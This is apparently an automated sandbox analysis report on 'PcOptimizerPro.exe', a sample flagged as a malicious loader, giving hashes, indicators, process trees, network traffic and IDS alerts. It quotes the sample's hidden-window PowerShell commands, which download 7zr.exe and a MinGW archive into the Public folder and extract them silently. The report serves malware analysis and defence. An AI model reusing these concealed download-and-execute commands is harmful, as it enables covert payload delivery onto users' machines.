| File name: | PcOptimizerPro.exe |
| Full analysis: | https://app.any.run/tasks/5d197c0f-b3c6-48e7-886e-5afbf647e958 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | October 03, 2025, 17:06:49 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (console) x86-64, for MS Windows, 6 sections |
| MD5: | 7A37DFB22CEAF682738E4DE87E8B81F1 |
| SHA1: | C31499D713FEA0A163A0CB8364261CFCFACAB1A5 |
| SHA256: | 7728C17E5019CE6DC7DEEF83F1C9612DC7617EF595D1A93AE8424D12C7282946 |
| SSDEEP: | 768:fydhnBdDzuGPT5fda8SSwREYTQsr99fiBnwoxGz9JRJP9NWOOMOTDv3bjE:uZP/aHGsh9TfpMOOLjjE |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 4584)
- powershell.exe (PID: 6388)
SUSPICIOUS
Hides command output
- cmd.exe (PID: 4444)
- cmd.exe (PID: 7980)
- cmd.exe (PID: 2176)
- cmd.exe (PID: 4108)
Likely accesses (executes) a file from the Public directory
- cmd.exe (PID: 4444)
- cmd.exe (PID: 4108)
- cmd.exe (PID: 7980)
- powershell.exe (PID: 4584)
- powershell.exe (PID: 6388)
- 7zr.exe (PID: 2128)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 4444)
- cmd.exe (PID: 7980)
Downloads file from URI via Powershell
- powershell.exe (PID: 4584)
- powershell.exe (PID: 6388)
Executable content was dropped or overwritten
- powershell.exe (PID: 6388)
Drops 7-zip archiver for unpacking
- powershell.exe (PID: 6388)
Hides errors and continues executing the command without stopping
- powershell.exe (PID: 4584)
- powershell.exe (PID: 6388)
There is functionality for taking screenshot (YARA)
- PcOptimizerPro.exe (PID: 6120)
Starts CMD.EXE for commands execution
- PcOptimizerPro.exe (PID: 6120)
INFO
Checks supported languages
- PcOptimizerPro.exe (PID: 6120)
- 7zr.exe (PID: 2128)
Disables trace logs
- powershell.exe (PID: 6388)
- powershell.exe (PID: 4584)
Checks proxy server information
- powershell.exe (PID: 6388)
- powershell.exe (PID: 4584)
- slui.exe (PID: 2192)
The sample compiled with english language support
- powershell.exe (PID: 6388)
Reads the computer name
- 7zr.exe (PID: 2128)
Reads the software policy settings
- slui.exe (PID: 2192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2025:10:03 17:01:21+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.44 |
| CodeSize: | 27136 |
| InitializedDataSize: | 29184 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x66f8 |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
Total processes
166
Monitored processes
10
Malicious processes
2
Suspicious processes
3
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1216 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2128 | C:\Users\Public\7zr.exe x C:\Users\Public\mingw.7z -oC:\Users\Public\ -y | C:\Users\Public\7zr.exe | — | cmd.exe | |||||||||||
User: admin Company: Igor Pavlov Integrity Level: MEDIUM Description: 7-Zip Reduced Standalone Console Version: 25.01 Modules
| |||||||||||||||
| 2176 | C:\WINDOWS\system32\cmd.exe /c g++ --version 2>nul | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2192 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4108 | C:\WINDOWS\system32\cmd.exe /c C:\Users\Public\7zr.exe x C:\Users\Public\mingw.7z -oC:\Users\Public\ -y >nul 2>&1 | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4444 | C:\WINDOWS\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z' -OutFile 'C:\Users\Public\mingw.7z' }" >nul 2>&1 | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4584 | powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z' -OutFile 'C:\Users\Public\mingw.7z' }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6120 | "C:\Users\admin\Desktop\PcOptimizerPro.exe" | C:\Users\admin\Desktop\PcOptimizerPro.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Modules
| |||||||||||||||
| 6388 | powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://www.7-zip.org/a/7zr.exe' -OutFile 'C:\Users\Public\7zr.exe' }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7980 | C:\WINDOWS\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://www.7-zip.org/a/7zr.exe' -OutFile 'C:\Users\Public\7zr.exe' }" >nul 2>&1 | C:\Windows\System32\cmd.exe | — | PcOptimizerPro.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
13 201
Read events
13 201
Write events
0
Delete events
0
Modification events
Executable files
1
Suspicious files
627
Text files
1 479
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4584 | powershell.exe | C:\Users\Public\mingw.7z | — | |
MD5:— | SHA256:— | |||
| 6388 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x1yxjhti.aad.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rgzo0304.lj2.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6388 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0o2vkjw1.kus.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\include\ansidecl.h | text | |
MD5:550446A6D9ED6D7ECCE30D964B346154 | SHA256:4E9B6D7A0CB0D268D268D8286FB43F913DA09A63258A4DE810950AAFD08F729A | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\bin\gdb-add-index | text | |
MD5:EB29B62EDC43C80F0CBC1AC8345591A9 | SHA256:D7B071199ECC8224A6DFF3F62BC1920E7D195B7B11680BD91C7805430927ED0B | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\include\ctf.h | text | |
MD5:EA965809B569D521613F1AE70194B829 | SHA256:312413A2801CDA5C936D661DF307A03D5C9329E0F44C92D628A12093E3AD4490 | |||
| 2128 | 7zr.exe | C:\Users\Public\mingw64\include\diagnostics.h | text | |
MD5:ABDCF5BDD20246C05EED95AE98DD2551 | SHA256:A92C7D29C0DF4AD62753CE7E37EC5231C572934EB5BD5A75A5F87012011F8CF3 | |||
| 4584 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:18E7FAC09ABA466B62747A3FB2A0CF88 | SHA256:C9C9A985C7A06B850427489C5E92CC828BC5A1E1F2A7A5F3000DD2F205350472 | |||
| 4584 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oqwd30aa.cy4.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
16
DNS requests
8
Threats
9
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 302 | 140.82.121.4:443 | https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z | unknown | — | — | unknown |
— | — | GET | 200 | 49.12.202.237:443 | https://www.7-zip.org/a/7zr.exe | unknown | executable | 587 Kb | unknown |
— | — | GET | 200 | 185.199.111.133:443 | https://release-assets.githubusercontent.com/github-production-release-asset/446033510/00d335dc-bf12-4597-b41d-567805d2431e?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-03T17%3A43%3A58Z&rscd=attachment%3B+filename%3Dx86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-03T16%3A43%3A52Z&ske=2025-10-03T17%3A43%3A58Z&sks=b&skv=2018-11-09&sig=x8AkWRgmFv0EJ3UPVlyYfDsX41PaUYV7BKm4S0NZDkM%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1OTUxMzAyMiwibmJmIjoxNzU5NTExMjIyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.MhGVWA-7BQwiFvTQPhxspi-ig9aE2jWEjho2kcDG8ec&response-content-disposition=attachment%3B%20filename%3Dx86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z&response-content-type=application%2Foctet-stream | unknown | — | 69.6 Mb | unknown |
— | — | POST | 500 | 4.154.185.43:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3404 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6016 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 95.101.136.194:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5948 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4584 | powershell.exe | 140.82.121.4:443 | github.com | GITHUB | US | whitelisted |
4584 | powershell.exe | 185.199.111.133:443 | release-assets.githubusercontent.com | FASTLY | US | whitelisted |
6388 | powershell.exe | 49.12.202.237:443 | www.7-zip.org | Hetzner Online GmbH | DE | whitelisted |
1920 | slui.exe | 4.154.185.43:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
github.com |
| whitelisted |
release-assets.githubusercontent.com |
| whitelisted |
www.7-zip.org |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |
2428 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access release user assets on GitHub |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Potentially Bad Traffic | ET HUNTING 7-zip Executable Requested (GET) |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP |
— | — | Misc activity | ET INFO Request for EXE via Powershell |